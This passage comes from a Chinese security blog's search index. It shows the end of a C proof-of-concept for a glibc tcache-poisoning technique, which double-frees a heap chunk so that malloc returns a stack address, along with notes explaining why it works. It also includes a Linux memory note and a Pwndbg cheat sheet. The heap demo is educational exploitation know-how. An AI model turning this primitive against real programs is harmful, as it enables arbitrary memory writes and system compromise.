libc does not include the restriction, you can simply double free the victim and do a</span><br><span class="hljs-comment"> * simple tcache poisoning</span><br><span class="hljs-comment"> * And thanks to @anton00b and @subwire for the weird name of this technique */</span><br><br> <span class="hljs-comment">// disable buffering so _IO_FILE does not interfere with our heap</span><br> <span class="hljs-built_in">setbuf</span>(stdin, <span class="hljs-literal">NULL</span>);<br> <span class="hljs-built_in">setbuf</span>(stdout, <span class="hljs-literal">NULL</span>);<br> <br> <span class="hljs-comment">// introduction</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"This file demonstrates a powerful tcache poisoning attack by tricking malloc into"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"returning a pointer to an arbitrary location (in this demo, the stack)."</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"This attack only relies on double free.\n"</span>);<br> <br> <span class="hljs-comment">// prepare the target</span><br> <span class="hljs-type">intptr_t</span> stack_var[<span class="hljs-number">4</span>];<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"The address we want malloc() to return, namely,"</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"the target address is %p.\n\n"</span>, stack_var);<br> <br> <span class="hljs-comment">// prepare heap layout</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Preparing heap layout"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later."</span>);<br> <span class="hljs-type">intptr_t</span> *x[<span class="hljs-number">7</span>];<br> <span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i=<span class="hljs-number">0</span>; i<<span class="hljs-built_in">sizeof</span>(x)/<span class="hljs-built_in">sizeof</span>(<span class="hljs-type">intptr_t</span>*); i++){<br> x[i] = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> }<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating a chunk for later consolidation"</span>);<br> <span class="hljs-type">intptr_t</span> *prev = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating the victim chunk."</span>);<br> <span class="hljs-type">intptr_t</span> *a = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"malloc(0x100): a=%p.\n"</span>, a); <br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Allocating a padding to prevent consolidation.\n"</span>);<br> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<br> <br> <span class="hljs-comment">// cause chunk overlapping</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Now we are able to cause chunk overlapping"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 1: fill up tcache list"</span>);<br> <span class="hljs-keyword">for</span>(<span class="hljs-type">int</span> i=<span class="hljs-number">0</span>; i<<span class="hljs-number">7</span>; i++){<br> <span class="hljs-built_in">free</span>(x[i]);<br> }<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 2: free the victim chunk so it will be added to unsorted bin"</span>);<br> <span class="hljs-built_in">free</span>(a);<br> <br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 3: free the previous chunk and make it consolidate with the victim chunk."</span>);<br> <span class="hljs-built_in">free</span>(prev);<br> <br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n"</span>);<br> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-comment">/*VULNERABILITY*/</span><br> <span class="hljs-built_in">free</span>(a);<span class="hljs-comment">// a is already freed</span><br> <span class="hljs-comment">/*VULNERABILITY*/</span><br> <br> <span class="hljs-comment">// simple tcache poisoning</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Launch tcache poisoning"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Now the victim is contained in a larger freed chunk, we can do a simple tcache poisoning by using overlapped chunk"</span>);<br> <span class="hljs-type">intptr_t</span> *b = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x120</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"We simply overwrite victim's fwd pointer"</span>);<br> b[<span class="hljs-number">0x120</span>/<span class="hljs-number">8</span><span class="hljs-number">-2</span>] = (<span class="hljs-type">long</span>)stack_var;<br> <br> <span class="hljs-comment">// take target out</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Now we can cash out the target chunk."</span>);<br> <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-type">intptr_t</span> *c = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x100</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"The new chunk is at %p\n"</span>, c);<br> <br> <span class="hljs-comment">// sanity check</span><br> <span class="hljs-built_in">assert</span>(c==stack_var);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Got control on target/stack!\n\n"</span>);<br> <br> <span class="hljs-comment">// note</span><br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Note:"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"And the wonderful thing about this exploitation is that: you can free b, victim again and modify the fwd pointer of victim"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"In that case, once you have done this exploitation, you can have many arbitary writes very easily."</span>);<br> <br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>}<br></code></pre></td></tr></table></figure><h2 id="达成目的"><a href="#达成目的" class="headerlink" title="达成目的"></a>达成目的</h2><p>造成tcache dup 进一步利用tcache 做任意地址分配堆块</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>为什么需要pre和consolidate:必须保证a已经不是unsortbin中的块</p><p>如果没有consolidate,可以double free 但是malloc(0x120)的时候取unsortbin 这时候a的fd已经被修改指向下一个tcache块 不满足条件</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs lisp">if (<span class="hljs-name">__glibc_unlikely</span> (<span class="hljs-name">bck->fd</span> != victim)<br><br> || __glibc_unlikely (<span class="hljs-name">victim->fd</span> != unsorted_chunks (<span class="hljs-name">av</span>)))<br><br> malloc_printerr (<span class="hljs-string">"malloc(): unsorted double linked list corrupted"</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure><p>低版本 <2.29 做 unsortbin attack的话 也不太行,会覆盖fd,fd需要泄漏libc。</p>]]></content>
<tags>
<tag>house of系列</tag>
</tags>
</entry>
<entry>
<title>linux内核-内存管理</title>
<link href="/2021/08/05/linue-memory-manage/"/>
<url>/2021/08/05/linue-memory-manage/</url>
<content type="html"><![CDATA[<p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108127090169-f784d99c-da06-40cb-b500-ed48b1be83ac.png"></p><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108127090214-f0f9dfd2-7899-43ae-816e-34403c36ac1d.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108127455693-b47c1227-0223-48f0-afdd-9057abac5753.png"></p><p>针对应用程序的堆、代码、栈、等,会使用lazy分配机制,只有当写内存页时,才会真实请求内存分配页表。但,当内核使用kmalloc申请内存时,就真实的分配相应的内存,不使用lazy机制。</p>]]></content>
<tags>
<tag>linux kernel</tag>
</tags>
</entry>
<entry>
<title>Pwndbg 经验总结</title>
<link href="/2021/08/04/Pwndbg%20%E7%BB%8F%E9%AA%8C%E6%80%BB%E7%BB%93/"/>
<url>/2021/08/04/Pwndbg%20%E7%BB%8F%E9%AA%8C%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="Pwndbg-经验总结"><a href="#Pwndbg-经验总结" class="headerlink" title="Pwndbg 经验总结"></a>Pwndbg 经验总结</h1><h2 id="有用的命令"><a href="#有用的命令" class="headerlink" title="有用的命令"></a>有用的命令</h2><figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs coq">e{b|<span class="hljs-type">d</span>|<span class="hljs-type">D</span>|<span class="hljs-type">f</span>|<span class="hljs-type">p</span>|<span class="hljs-type">q</span>|<span class="hljs-type">w</span>} Address [Values]<br>e{a|<span class="hljs-type">u</span>|<span class="hljs-type">za</span>|<span class="hljs-type">zu</span>} Address “String”<br>e Address [Values]<br></code></pre></td></tr></table></figure><blockquote><p>e:这将以与最新的e*命令相同的格式输入数据。<br>ea和eza:作为ascii字符串写入内存;<br>eu和ezu:作为unicode字符串写入内存。<br>eza和ezu命令会写入一个终端空值,ea和eu命令不会字符串必须用引号括起来。</p></blockquote><figure class="highlight bnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bnf">x/<span class="hljs-attribute"><n/f/u></span> <span class="hljs-attribute"><addr></span><br></code></pre></td></tr></table></figure><blockquote><p>n、f、u是可选的参数。n是一个正整数,表示显示内存的长度,也就是说从当前地址向后显示几个地址的内容。<br>f 表示显示的格式,参见上面。如果地址所指的是字符串,那么格式可以是s,如果 地址是指令地址,那么格式可以是i。<br>u 表示从当前地址往后请求的字节数,如果不指定的话,GDB默认是4个bytes。u参数可以用下面的字符来代替,b表示单字节,h表示双字节,w表示四字 节,g表示八字节。当我们指定了字节长度后,GDB会从指内存定的内存地址开始,读写指定字节,并把其当作一个值取出来。</p></blockquote><h2 id="Telescope"><a href="#Telescope" class="headerlink" title="Telescope"></a>Telescope</h2><blockquote><p>Inspecting memory dumps is easy with the telescope command. It recursively dereferences a range of memory, letting you see everything at once. As an added bonus, Pwndbg checks all of the available registers to see if they point into the memory range.</p></blockquote><h2 id="Search"><a href="#Search" class="headerlink" title="Search"></a>Search</h2><blockquote><p>Pwndbg makes searching the target memory space easy, with a complete and easy-to-use interface. Whether you’re searching for bytes, strings, or various sizes of integer values or pointers, it’s a simple command away.</p></blockquote><h2 id="ROP-Gadgets"><a href="#ROP-Gadgets" class="headerlink" title="ROP Gadgets"></a>ROP Gadgets</h2><blockquote><p>Pwndbg makes using ROPGadget easy with the actual addresses in the process.<br>Just use the rop command!</p></blockquote><h2 id="Process-State-Inspection"><a href="#Process-State-Inspection" class="headerlink" title="Process State Inspection"></a>Process State Inspection</h2><blockquote><p>Use the procinfo command in order to inspect the current process state, like UID, GID, Groups, SELinux context, and open file descriptors! Pwndbg works particularly well with remote GDB debugging like with Android phones, which PEDA, GEF, and vanilla GDB choke on.</p></blockquote><h2 id="Finding-Leaks"><a href="#Finding-Leaks" class="headerlink" title="Finding Leaks"></a>Finding Leaks</h2><blockquote><p>Finding leak chains can be done using the leakfind command. It recurisvely inspects address ranges for pointers, and reports on all pointers found.</p></blockquote><h2 id="some-heap-function"><a href="#some-heap-function" class="headerlink" title="some heap function"></a>some heap function</h2><p><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012051.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012023.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012105.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012119.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012145.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012201.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012209.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012219.png"><br><img src="https://cdn.jsdelivr.net/gh/Allyin/images/img/202108/20210805012232.png"></p>]]></content>
<tags>
<tag>debuger</tag>
</tags>
</entry>
</search>